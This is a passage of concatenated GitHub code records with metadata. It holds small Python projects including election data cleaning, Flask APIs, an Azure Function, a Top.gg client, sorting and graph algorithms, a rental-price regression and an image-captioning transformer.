LENGELE JR ', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'FRANK L LENGELE JR ', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'SKYE FARNAM', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'SKYE FARNAM', 'party_simplified'] = 'OTHER'\n\n\n# In[10]:\n\n\ndef district(x):\n if x == '':\n return '' \n if x == 'STATEWIDE':\n return x\n else:\n return x.zfill(3)\ndf['district'] = df['district'].apply(district)\n\n# drop total votes\ndf = df[~(df['office']==\"\")].copy()\n# drop duplicates and double counting\ndf = df.drop_duplicates()\ndf = df[~(df['precinct'].isin(['CLACKAMAS OR', 'COOS OR', 'CROOK OR', 'GRANT OR', 'JOSEPHINE OR',\n 'LANE OR', 'LINN OR', 'UNION OR']))].copy()\n\n# In[11]:\n\n\n# Final step: Remove all trailing white space and put columns in correct order. \ndf=df.applymap(lambda x: x.strip() if type(x)==str else x)\n\ndf=df[[\"precinct\", \"office\", \"party_detailed\", \"party_simplified\", \"mode\", \"votes\", \"county_name\", \"county_fips\", \"jurisdiction_name\",\n \"jurisdiction_fips\", \"candidate\", \"district\", \"dataverse\", \"year\", \"stage\", \"state\", \"special\", \"writein\", \"state_po\",\n \"state_fips\", \"state_cen\", \"state_ic\", \"date\", \"readme_check\", \"magnitude\"]]\n\ndf.to_csv('2018-or-precinct-general-updated.csv',quoting=csv.QUOTE_NONNUMERIC, index=False)\n\n\n\n","repo_name":"MEDSL/replication-scripts","sub_path":"or2018.py","file_name":"or2018.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5417971114","text":"from flask import Flask, request, jsonify\nimport json\n\napp = Flask(__name__)\n\ntables = []\nrelationships = []\n\nclass Table:\n def __init__(self, name):\n self.name = name\n self.attributes = []\n\nclass Relationship:\n def __init__(self, table1, degree1, table2, degree2, text):\n self.table1 = table1\n self.degree1 = degree1\n self.table2 = table2\n self.degree2 = degree2\n self.text = text\n\n@app.route('/tables', methods=['POST'])\ndef add_table():\n data = request.get_json()\n table_name = data['name']\n table = Table(table_name)\n tables.append(table)\n return jsonify({\"message\": f\"Table {table_name} added successfully.\"}), 201\n\n@app.route('/tables', methods=['GET'])\ndef get_tables():\n table_names = [table.name for table in tables]\n return jsonify(table_names), 200\n\n@app.route('/attributes', methods=['POST'])\ndef add_attribute():\n data = request.get_json()\n table_name = data['table']\n attribute_name = data['name']\n attribute_type = data['type']\n\n table = next((table for table in tables if table.name == table_name), None)\n if table:\n table.attributes.append({\"name\": attribute_name, \"type\": attribute_type})\n return jsonify({\"message\": f\"Attribute {attribute_name} added to table {table_name} successfully.\"}), 201\n else:\n return jsonify({\"error\": f\"Table {table_name} not found.\"}), 404\n\n@app.route('/relationships', methods=['POST'])\ndef add_relationship():\n data = request.get_json()\n table1 = data['table1']\n degree1 = data['degree1']\n table2 = data['table2']\n degree2 = data['degree2']\n text = data['text']\n\n relationship = Relationship(table1, degree1, table2, degree2, text)\n relationships.append(relationship)\n return jsonify({\"message\": \"Relationship added successfully.\"}), 201\n\n@app.route('/code', methods=['GET'])\ndef generate_mermaid_code():\n mermaid_code = \"erDiagram\\n\"\n for table in tables:\n 
mermaid_code += f\"{table.name} {{\\n\"\n for attr in table.attributes:\n mermaid_code += f\" {attr['name']} {attr['type']}\\n\"\n mermaid_code += \"}\\n\"\n for relationship in relationships:\n mermaid_code += f\"{relationship.table1} {relationship.degree1}--{relationship.degree2} {relationship.table2} : {relationship.text}\\n\"\n\n return jsonify({\"code\": mermaid_code}), 200\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"acairon/MycVProyect","sub_path":"Proyectos/Crear_mermaid/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35990022719","text":"import json\nimport pandas as pd\n\ndef analysis(file,user_id):\n if(file and user_id):\n df = pd.read_json(file)\n times = 0\n minutes = 0\n minutes = df[df['user_id']==user_id]['minutes'].sum()\n times = df[df['user_id']==user_id]['user_id'].count()\n return times,minutes\n else:\n return 0\n\nif '__name__' == '__main__':\n data = analysis('/home/Code/user_study.json',199071)\n print('haha')\n print(data)\n","repo_name":"ljt1469/shiyanlou-001","sub_path":"analysis-challenge13.py","file_name":"analysis-challenge13.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13552221757","text":"import logging\r\n\r\nimport azure.functions as func\r\nimport uuid\r\nfrom datetime import datetime\r\nimport json\r\n\r\n\r\ndef main(req: func.HttpRequest, doc: func.Out[func.Document]) -> func.HttpResponse:\r\n logging.info('Python HTTP trigger function processed a request.')\r\n\r\n try:\r\n req_body = req.get_json()\r\n if 'productId' not in req_body:\r\n logging.error('Missing productId')\r\n return func.HttpResponse(f\"Missing productId\", status_code=400)\r\n if 'userId' not in req_body:\r\n logging.error('Missing userId')\r\n return func.HttpResponse(f\"Missing userId\", status_code=400)\r\n if 'rating' not in req_body:\r\n logging.error('Missing rating')\r\n return func.HttpResponse(f\"Missing rating\", status_code=400)\r\n if isinstance(req_body['rating'], int) is False:\r\n logging.error('Rating is not numeric')\r\n return func.HttpResponse(f\"Rating is not numeric\", status_code=400)\r\n if req_body['rating'] < 0 or req_body['rating'] > 5:\r\n logging.error('Rating out of range')\r\n return func.HttpResponse(f\"Rating out of range\", status_code=400)\r\n except ValueError:\r\n return func.HttpResponse(f\"Invalid entry\", status_code=500)\r\n\r\n data = {}\r\n for val in ['productId', 'userId', 'rating', 'locationName', 'userNotes']:\r\n if val in req_body:\r\n data[val] = req_body[val]\r\n else:\r\n data[val] = \"\"\r\n \r\n data['id'] = str(uuid.uuid4())\r\n data['timestamp'] = datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%SZ\")\r\n doc.set(func.Document.from_dict(data))\r\n \r\n return func.HttpResponse(\r\n json.dumps(data),\r\n status_code=200\r\n )\r\n","repo_name":"sajitsasi/serverless-openhack","sub_path":"CreateRating/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31963127688","text":"import collections\n\nclass PartitionRefinement2(object):\n def __init__(self, initial_sets):\n self.sets = list(initial_sets)\n # Map each element to its index in the sets table\n self.si_map = {}\n for i, s in enumerate(self.sets):\n for x in s:\n self.si_map[x] = 
i\n\n def split(self, s):\n splitmap = {}\n for x in s:\n old_si = self.si_map[x]\n if old_si not in splitmap:\n splitmap[old_si] = len(self.sets)\n self.sets.append(set())\n new_si = splitmap[old_si]\n\n self.sets[old_si].remove(x)\n self.sets[new_si].add(x)\n self.si_map[x] = new_si\n\n res = []\n for old_si, new_si in splitmap.items():\n if not self.sets[new_si]:\n continue\n if not self.sets[old_si]:\n # We \"split\" the entire set into new set - move it back\n self.sets[new_si], self.sets[old_si] = self.sets[old_si], self.sets[new_si]\n for x in self.sets[old_si]:\n self.si_map[x] = old_si\n continue\n res.append((old_si, new_si))\n\n while not self.sets[-1]:\n self.sets.pop()\n return res\n\n def debug(self):\n return sorted(sorted(s) for s in self.sets if s)\n\ndef simplify(initial_sets, edges):\n rev_edges = {k: collections.defaultdict(list) for k in edges}\n for k, v in edges.items():\n for tok, k2 in v.items():\n rev_edges[k2][tok].append(k)\n\n\n partitions = PartitionRefinement2(initial_sets)\n workset = set(range(len(initial_sets)))\n\n # for k in (38, 52):\n # k = 'State', k\n # si = partitions.si_map[k]\n # print 'initial set for', k\n # print si, partitions.sets[si]\n\n # v1 = 'State', 38\n # v2 = 'State', 52\n # hassplit = False\n\n while workset:\n si = workset.pop()\n\n predecessors = collections.defaultdict(set)\n for x in partitions.sets[si]:\n for tok, preds in rev_edges[x].items():\n predecessors[tok].update(preds)\n\n for tok, preds in predecessors.items():\n split_pairs = partitions.split(preds)\n # if not hassplit and partitions.si_map[v1] != partitions.si_map[v2]:\n # print 'Split!', partitions.si_map[v1], partitions.si_map[v2]\n # hassplit = True\n # print 'split from', tok, preds\n\n\n for i1, i2 in split_pairs:\n set1 = partitions.sets[i1]\n set2 = partitions.sets[i2]\n # if (52 in set1 and 38 in set2) or (38 in set1 and 52 in set2):\n # print 'split', set1, set2\n\n if i1 in workset:\n workset.add(i2)\n else:\n # choose the smaller of the two new sets to add to the work list\n workset.add(min((i1, i2), key=lambda i:len(partitions.sets[i])))\n return partitions.sets\n","repo_name":"Storyyeller/ankou","sub_path":"hopcroft.py","file_name":"hopcroft.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"71190624534","text":"# 평문을 암호로 바꿨을때(대문자 1~26 소문자 27~52) 암호문과 일치하는지를 물어보는 문제\n# 암호문은 순서를 섞어놓았다는 점에 주의\n# 값의 범위가 넓다 따라서 빠른 입출력을 사용하자\n# 대문자 65~90 소문자 97~122\n# 대문자 1~26 소문자 27~52\nimport sys\n\nn = int(input())\ncode = sorted(map(int, sys.stdin.readline().rstrip().split())) # 암호문\nclear_text = input() # 평문\ndef change(m):\n c = ord(m)\n if 65 <= c <= 90:\n c -= 64\n elif 97 <= c <= 122:\n c -= 70\n else:\n c = 0\n return c\n\n\narray = sorted([change(i) for i in clear_text])\nfor i in range(n):\n if code[i] != array[i]:\n print(\"n\")\n break\nelse:\n print(\"y\")","repo_name":"magnificentLee/Study","sub_path":"알고리즘/구현/101~150/141.암호해독기.py","file_name":"141.암호해독기.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16852959363","text":"import aiohttp\nimport asyncio\nfrom typing import Union, Sequence, List\n\nfrom .api import Api\nfrom .models import Bot, Search, Stats, VotedUser, User, Vote\nfrom .enums import WidgetType\nfrom .widget import Widget\n\n\nclass HttpClient:\n \"\"\" Top.gg의 Http 클라이언트를 선언합니다.\n 이 클래스를 통하여 top.gg API에 연결됩니다.\n\n Parameters\n 
----------\n token: Optional[str]\n Top.gg 에서 발급받은 봇의 토큰 키값 입니다. 데이터를 반영하거나 불러올 때 토큰 값이 사용됩니다.\n session: Optional[aiohttp.ClientSession]\n HttpClient 를 위한 aiohttp 의 ClientSession 클래스 입니다.\n 기본값은 None이며, 자동으로 ClientSession을 생성하게 됩니다.\n loop: Optional[asyncio.AbstractEventLoop]\n 비동기를 사용하기 위한 asyncio.AbstractEventLoop 입니다.\n 기본값은 None 입니다.\n 기본 asyncio.AbstractEventLoop는 asyncio.get_event_loop()를 사용하여 얻습니다.\n \"\"\"\n def __init__(self, token: str = None,\n session: aiohttp.ClientSession = None,\n loop: asyncio.AbstractEventLoop = None):\n self.token = token\n self.requests = Api(token=token, session=session, loop=loop)\n self.session = session\n\n async def bot(self, bot_id: int) -> Bot:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n 봇 정보를 불러옵니다.\n\n Parameters\n ----------\n bot_id: int\n 봇 ID 값이 포함됩니다.\n\n Returns\n -------\n Bot:\n Top.gg로 부터 들어온 봇 정보가 포함되어 있습니다.\n \"\"\"\n path = \"/bots/{bot_id}\".format(bot_id=bot_id)\n\n result = await self.requests.get(path=path)\n return Bot(result)\n\n async def search(self,\n sort: str = None,\n search=None,\n fields: Sequence[str] = \"\",\n limit: int = 50,\n offset: int = 0) -> Search:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n Top.gg에서 봇을 검색합니다.\n\n Parameters\n ----------\n sort: Optional[str]\n 정렬이 되는 기준이 포함됩니다.\n search: Optional[Dict[int]]\n 검색할 디스코드 봇의 이름이 포함됩니다.\n fields: Sequence[str]\n 표시할 쉼표로 구분된 필드 목록입니다. search 값에 \",\"로 구분을 할 경우 해당 값이 사용됩니다.\n limit: Optional[int]\n 불러올 봇의 양의 갯수가 포함됩니다. 기본 값은 50개입니다. 최댓 값은 500개 입니다.\n offset: Optional[int]\n 건너 뛸 디스코드 봇의 갯수가 포함됩니다. 기본 값은 0입니다.\n\n Returns\n -------\n Search:\n Top.gg로 부터 들어온 봇 정보가 포함되어 있습니다.\n \"\"\"\n if search is None:\n search = {}\n\n limit = min(limit, 500)\n fields = \", \".join(fields)\n search = \" \".join([f\"{field}: {value}\" for field, value in search.items()])\n\n data = {\n \"limit\": limit,\n \"offset\": offset,\n \"search\": search,\n \"fields\": fields,\n \"sort\": sort\n }\n path = \"/search\"\n\n result = await self.requests.get(path=path, query=data)\n return Search(result)\n\n async def vote(self, bot_id: int, user_id: int) -> Vote:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n `user_id`에 들어있는 사용자가 봇에 투표를 누른 여부에 대하여 불러옵니다.\n\n Parameters\n ----------\n bot_id: int\n 봇 ID 값이 포함됩니다.\n user_id: int\n 유저 ID 값이 포함되어 있습니다.\n\n Returns\n -------\n Vote:\n Top.gg로 부터 들어온 사용자 투표 정보에 대한 정보가 포함되어 있습니다.\n \"\"\"\n data = {\n \"userId\": str(user_id)\n }\n path = \"/bots/{bot_id}/check\".format(bot_id=bot_id)\n result = await self.requests.get(path=path, query=data)\n return Vote(result)\n\n async def votes(self, bot_id: int) -> List[VotedUser]:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n 투표를 누른 사용자 목록을 모두 불러옵니다.\n\n Parameters\n ----------\n bot_id: int\n 봇 ID 값이 포함됩니다.\n\n Returns\n -------\n List[User]:\n Top.gg로 부터 투표 누른 사용자 목록에 대한 정보가 포함되어 있습니다.\n \"\"\"\n path = \"/bots/{bot_id}/votes\".format(bot_id=bot_id)\n result = await self.requests.get(path=path)\n return [VotedUser(user) for user in result]\n\n async def stats(self, bot_id: int,\n guild_count: Union[int, list] = None,\n shard_id: int = None,\n shard_count: int = None) -> Stats:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n 봇 정보를 수신하거나 발신합니다.\n\n Parameters\n ----------\n bot_id: int\n 봇 ID 값이 포함됩니다.\n guild_count: Optional[Union[int, list]]\n 서버 갯수가 포함되어 있습니다.\n shard_id: Optional[int]\n (Shard를 사용할 때만 해당됩니다.) 샤드의 ID 값이 포함됩니다.\n shard_count: Optional[int]\n (Shard를 사용할 때만 해당됩니다.) 
샤드의 갯수가 포함됩니다.\n\n Returns\n -------\n Stats:\n Top.gg로 부터 들어온 봇 상태 정보가 포함되어 있습니다.\n \"\"\"\n path = \"/bots/{bot_id}/stats\".format(bot_id=bot_id)\n\n if guild_count is not None:\n data = {\n \"server_count\": guild_count,\n \"shard_id\": shard_id,\n \"shard_count\": shard_count\n }\n result = await self.requests.post(path=path, json=data)\n else:\n result = await self.requests.get(path=path)\n return Stats(result)\n\n async def users(self, user_id: int) -> User:\n \"\"\"\n 본 함수는 코루틴(비동기)함수 입니다.\n\n 사용자 정보를 불러옵니다.\n\n Parameters\n ----------\n user_id: int\n 사용자 ID 값이 포함됩니다.\n\n Returns\n -------\n User\n Top.gg로 부터 들어온 사용자 정보가 포함되어 있습니다.\n \"\"\"\n path = \"/users/{user_id}\".format(user_id=user_id)\n\n self.requests.version = 2\n result = await self.requests.get(path=path)\n return User(result)\n\n def widget(self, bot_id: int, widget_type: WidgetType = None) -> Widget:\n \"\"\"\n Top.gg를 통하여 디스코드 봇의 위젯 값을 불러옵니다.\n\n Parameters\n ----------\n widget_type: WidgetType\n 위젯 유형값이 포함됩니다.\n bot_id: int\n 위젯에 사용되는 디스코드 봇 ID가 포함됩니다.\n\n Returns\n -------\n Widget:\n Top.gg의 위젯이 들어간 Assets 값이 리턴됩니다.\n \"\"\"\n query = dict()\n if isinstance(widget_type, WidgetType):\n widget_t = widget_type.value\n else:\n widget_t = widget_type\n\n if widget_type is None:\n path = \"/widget/{widget_type}/{bot_id}\".format(widget_type=widget_t, bot_id=bot_id)\n else:\n path = \"/widget/{bot_id}\".format(widget_type=widget_t, bot_id=bot_id)\n return Widget(path=path, query=query, session=self.session)\n","repo_name":"gunyu1019/DBSkr-py","sub_path":"DBSkr/topgg/https.py","file_name":"https.py","file_ext":"py","file_size_in_byte":7877,"program_lang":"python","lang":"ko","doc_type":"code","stars":8,"dataset":"github-code","pt":"67"} +{"seq_id":"10515795353","text":"import pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_absolute_error\n\n# 从csv文件中读取数据集\ndata = pd.read_csv('xablzufang.csv', encoding='utf-8-sig')\ncol = ['type', 'bc', 'distance', 'rent_area', 'rent_price']\ndata = pd.DataFrame(data, columns=col)\n\n# 将\"None\"替换为\"100000000\",并将距离转换为数字类型\ndata[\"distance\"] = data[\"distance\"].replace(\"None\", \"100000000\")\ndata[\"distance\"] = data[\"distance\"].str.replace(\"m\", \"\").astype(float)\n\n# 将rent_area列的值缩放到0到1的范围内\ndata[\"rent_area\"] = data[\"rent_area\"] / 5000.0\n\n# 使用OneHotEncoder将类型和区域编码为二进制形式\nencoder = OneHotEncoder(sparse=False)\ndata_encoded = pd.DataFrame(encoder.fit_transform(data[[\"type\", \"bc\"]]))\ndata_encoded.columns = encoder.get_feature_names([\"type\", \"bc\"])\ndata = pd.concat([data, data_encoded], axis=1)\n\n# 删除原始的\"type\"和\"bc\"列\ndata = data.drop([\"type\", \"bc\"], axis=1)\n\n# 将数据集拆分为训练集和测试集\ntrain_data, test_data = train_test_split(data, test_size=0.2)\n\n# 训练线性回归模型\nmodel = LinearRegression()\nmodel.fit(train_data.drop(\"rent_price\", axis=1), train_data[\"rent_price\"])\n\n# 对测试集进行预测,并计算MAE\npredictions = model.predict(test_data.drop(\"rent_price\", axis=1))\nmae = mean_absolute_error(test_data[\"rent_price\"], predictions)\nprint(\"MAE:\", mae)\n","repo_name":"Gummim10/Example-of-Learning-Data-Mining-with-Python","sub_path":"2-RentalHousingData/model1_ljxa.py","file_name":"model1_ljxa.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16782379000","text":"\"\"\"\nGiven a binary tree, populate an array to repre 
its level-by-level traversal. You should populate the values of all nodes of\neach level from left to right in separate subarrays.\n\n\"\"\"\n\nclass Tree:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\ndef levelTraversal(root):\n queue = [root]\n visited = [root]\n res = []\n\n while queue:\n currentLevel = []\n level_Size = len(queue)\n \n\n for _ in range(level_Size):\n current = queue.pop(0)\n currentLevel.append(current.val)\n # print(current.val)\n\n\n if current.left:\n queue.append(current.left)\n visited.append(current.left)\n if current.right:\n queue.append(current.right)\n visited.append(current.right)\n res.append(currentLevel)\n return res\n\nnewTree = Tree(1)\nnewTree.left = Tree(2)\nnewTree.right = Tree(3)\nnewTree.left.left = Tree(4)\nnewTree.left.right = Tree(5)\nnewTree.right.right = Tree(7)\nnewTree.right.left = Tree(6)\n\n\nprint(levelTraversal(newTree))\n\n \n\n\n\n","repo_name":"samadon1/DSA-Practice","sub_path":"Breadth_first_search/level_order_traversal.py","file_name":"level_order_traversal.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27525781700","text":"def insertionSort(alist):\r\n for i in range(1, len(alist)): \r\n key = alist[i] \r\n j = i-1\r\n while j >= 0 and key < alist[j]: \r\n alist[j + 1] = alist[j] \r\n j -= 1\r\n alist[j + 1] = key \r\n\r\nif __name__ == '__main__':\r\n\tA = [2, 6, 1, 3 , 0]\r\n\tinsertionSort(A)\r\n\tprint(A)\r\n","repo_name":"rbdiwash/-CE-III_Roll-No-42_Lab1-2-3","sub_path":"insertionsort_lab2.py","file_name":"insertionsort_lab2.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19382820828","text":"def solution(numbers, hand):\n\n answer = ''\n left_x, left_y = (3,0)\n right_x, right_y = (3,2)\n\n table = {1: (0,0), 2: (0,1), 3: (0,2),\n 4: (1,0), 5: (1,1), 6: (1,2),\n 7: (2,0), 8: (2,1), 9:(2,2),\n 0: (3,1)}\n\n for i in numbers:\n if i in[1,4,7]:\n answer += \"L\"\n left_x,left_y = table[i]\n elif i in [3,6,9]:\n answer += \"R\"\n right_x,right_y=table[i]\n\n #중앙에 있는 버튼일 경우 3가지로 조건으로 나뉜다.\n else:\n current_x,current_y=table[i]\n left = abs(current_x - left_x) + abs(current_y - left_y)\n right = abs(current_x - right_x) + abs(current_y - right_y)\n\n # 1.오른쪽의 거리가 더 가까울 경우\n if left> right:\n answer += \"R\"\n right_x, right_y = current_x, current_y\n\n # 2.왼족의 거리가 더 가까울 경우\n elif left= j, dtype=\"int32\")\n mask = tf.reshape(mask, (1, input_shape[1], input_shape[1]))\n mult = tf.concat(\n [tf.expand_dims(batch_size, -1), tf.constant([1, 1], dtype=tf.int32)],\n axis=0,\n )\n return tf.tile(mask, mult)\n\n\nclass ImageCaptioningModel(keras.Model):\n def __init__(\n self,\n cnn_model,\n embed_dim,\n ff_dim,\n num_heads,\n key_dim,\n value_dim,\n seq_length,\n vocab_size,\n ):\n super().__init__()\n self.cnn_model = get_cnn_model(cnn_model)\n self.embed_dim = embed_dim\n self.ff_dim = ff_dim\n self.num_heads = num_heads\n self.key_dim = key_dim\n self.value_dim = value_dim\n self.seq_length = seq_length\n self.vocab_size = vocab_size\n self.encoder = Encoder(\n embed_dim,\n ff_dim,\n num_heads,\n key_dim,\n value_dim,\n )\n self.decoder = Decoder(\n embed_dim, ff_dim, num_heads, vocab_size, key_dim, value_dim, seq_length\n )\n\n self.loss_tracker = keras.metrics.Mean(name=\"loss\")\n self.acc_tracker = keras.metrics.Mean(name=\"accuracy\")\n self.num_captions_per_image = 5\n\n def 
call(self, inputs):\n enc_input = self.cnn_model(inputs[0])\n # print('\\n\\nENC_INPUT', enc_input) # (None, 64, 2048)\n enc_output = self.encoder(enc_input, False)\n # print('\\n\\nENC_INPUT', enc_input) # (None, 64, 2048)\n dec_output = self.decoder(inputs[2], enc_output, training=inputs[1], mask=None)\n # print('\\n\\nENC_INPUT', enc_input) # (None, 64, 2048)\n return dec_output\n\n def calculate_loss(self, y_true, y_pred, mask):\n loss = self.loss(y_true, y_pred)\n mask = tf.cast(mask, dtype=loss.dtype)\n loss *= mask\n return tf.reduce_sum(loss) / tf.reduce_sum(mask)\n\n def calculate_accuracy(self, y_true, y_pred, mask):\n accuracy = tf.equal(y_true, tf.argmax(y_pred, axis=2))\n accuracy = tf.math.logical_and(mask, accuracy)\n accuracy = tf.cast(accuracy, dtype=tf.float32)\n mask = tf.cast(mask, dtype=tf.float32)\n return tf.reduce_sum(accuracy) / tf.reduce_sum(mask)\n\n def train_step(self, batch_data):\n batch_img, batch_seq = batch_data\n batch_loss = 0\n batch_acc = 0\n\n # 1. Get image embeddings\n img_embed = self.cnn_model(batch_img)\n\n # 2. Pass each of the five captions one by one to the decoder\n # along with the encoder outputs and compute the loss as well as accuracy\n # for each caption.\n for i in range(self.num_captions_per_image):\n with tf.GradientTape() as tape:\n # 3. Pass image embeddings to encoder\n encoder_out = self.encoder(img_embed, training=True)\n\n batch_seq_inp = batch_seq[:, i, :-1]\n batch_seq_true = batch_seq[:, i, 1:]\n\n # 4. Compute the mask for the input sequence\n mask = tf.math.not_equal(batch_seq_inp, 0)\n\n # 5. Pass the encoder outputs, sequence inputs along with\n # mask to the decoder\n batch_seq_pred = self.decoder(\n batch_seq_inp, encoder_out, training=True, mask=mask\n )\n\n # 6. Calculate loss and accuracy\n caption_loss = self.calculate_loss(batch_seq_true, batch_seq_pred, mask)\n caption_acc = self.calculate_accuracy(\n batch_seq_true, batch_seq_pred, mask\n )\n\n # 7. Update the batch loss and batch accuracy\n batch_loss += caption_loss\n batch_acc += caption_acc\n\n # 8. Get the list of all the trainable weights\n train_vars = (\n self.encoder.trainable_variables + self.decoder.trainable_variables\n )\n\n # 9. Get the gradients\n grads = tape.gradient(caption_loss, train_vars)\n\n # 10. Update the trainable weights\n self.optimizer.apply_gradients(zip(grads, train_vars))\n\n loss = batch_loss\n acc = batch_acc / float(self.num_captions_per_image)\n\n self.loss_tracker.update_state(loss)\n self.acc_tracker.update_state(acc)\n return {\"loss\": self.loss_tracker.result(), \"acc\": self.acc_tracker.result()}\n\n def test_step(self, batch_data):\n batch_img, batch_seq = batch_data\n batch_loss = 0\n batch_acc = 0\n\n # 1. Get image embeddings\n img_embed = self.cnn_model(batch_img)\n\n # 2. Pass each of the five captions one by one to the decoder\n # along with the encoder outputs and compute the loss as well as accuracy\n # for each caption.\n for i in range(self.num_captions_per_image):\n # 3. Pass image embeddings to encoder\n encoder_out = self.encoder(img_embed, training=False)\n\n batch_seq_inp = batch_seq[:, i, :-1]\n batch_seq_true = batch_seq[:, i, 1:]\n\n # 4. Compute the mask for the input sequence\n mask = tf.math.not_equal(batch_seq_inp, 0)\n\n # 5. Pass the encoder outputs, sequence inputs along with\n # mask to the decoder\n batch_seq_pred = self.decoder(\n batch_seq_inp, encoder_out, training=False, mask=mask\n )\n\n # 6. 
Calculate loss and accuracy\n caption_loss = self.calculate_loss(batch_seq_true, batch_seq_pred, mask)\n caption_acc = self.calculate_accuracy(batch_seq_true, batch_seq_pred, mask)\n\n # 7. Update the batch loss and batch accuracy\n batch_loss += caption_loss\n batch_acc += caption_acc\n\n loss = batch_loss\n acc = batch_acc / float(self.num_captions_per_image)\n\n self.loss_tracker.update_state(loss)\n self.acc_tracker.update_state(acc)\n return {\"loss\": self.loss_tracker.result(), \"acc\": self.acc_tracker.result()}\n\n @property\n def metrics(self):\n return [self.loss_tracker, self.acc_tracker]\n","repo_name":"raphaeldiscky/image-captioning-transformer","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"35672382210","text":"from flask import Flask\nfrom flask_cors import CORS, cross_origin\n\napi = Flask(__name__)\ncors = CORS(api)\napi.config['CORS_HEADERS'] = 'Content-Type'\n\n@api.route('/profile')\n@cross_origin()\ndef my_profile():\n response_body = {\n \"name\": \"Roger\",\n \"about\" :\"Hello! I'm a full stack developer that loves python and javascript\"\n }\n return response_body\nif __name__ == \"__main__\":\n api.run(ssl_context=('cert.pem', 'key.pem'))","repo_name":"rogerkeithi/DesignPatterns","sub_path":"backend/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"33046673279","text":"mujeres = 0\nvarones = 0\nmayores_edad = 0\nmenores_edad = 0\n\nfor i in range(15):\n edad = int(input(\"Ingrese la edad de la persona: \"))\n sexo = input(\"Ingrese el sexo de la persona (M/F): \")\n\n if sexo == \"F\":\n mujeres += 1\n elif sexo == \"M\":\n varones += 1\n\n if edad >= 18:\n mayores_edad += 1\n else:\n menores_edad += 1\n\nprint(\"Cantidad de mujeres:\", mujeres)\nprint(\"Cantidad de varones:\", varones)\nprint(\"Cantidad de personas mayores de edad:\", mayores_edad)\nprint(\"Cantidad de personas menores de edad:\", menores_edad)\n","repo_name":"JuanPSuarez/TSCDIA-Programacion-1","sub_path":"5/Ejercicio_3.py","file_name":"Ejercicio_3.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25506737709","text":"contato = {'Nome':'Wallace','Telefone':'991877123','Email':'wallacenevesk9@outlook.com',\n'Endereco':'Rua Rosa Muller'}\n\n\ndef get(dic,key, valor=None):\n if key in dic:\n return dic[key]\n else:\n return valor\n\nprint(get(contato,'Nome'))\nprint(get(contato,'Telefone'))\n\n","repo_name":"21seya/ExerciciosBasicoPython","sub_path":"aula114.py","file_name":"aula114.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25183354047","text":"import webbrowser\n\nimport click\nfrom kubernetes import config\nfrom kubernetes.client import configuration\n\nfrom util.spinner import spinner\nfrom util.network import wait_for_connection\nfrom util.logger import initialize_logger\nfrom util.system import wait_for_ctrl_c\nfrom util.app_names import NAUTAAppNames\nfrom util.k8s.k8s_proxy_context_manager import K8sProxy\nfrom util.exceptions import K8sProxyOpenError, K8sProxyCloseError, LocalPortOccupiedError, LaunchError, \\\n ProxyClosingError\nfrom cli_text_consts import UtilLauncherTexts as Texts\n\nlogger = 
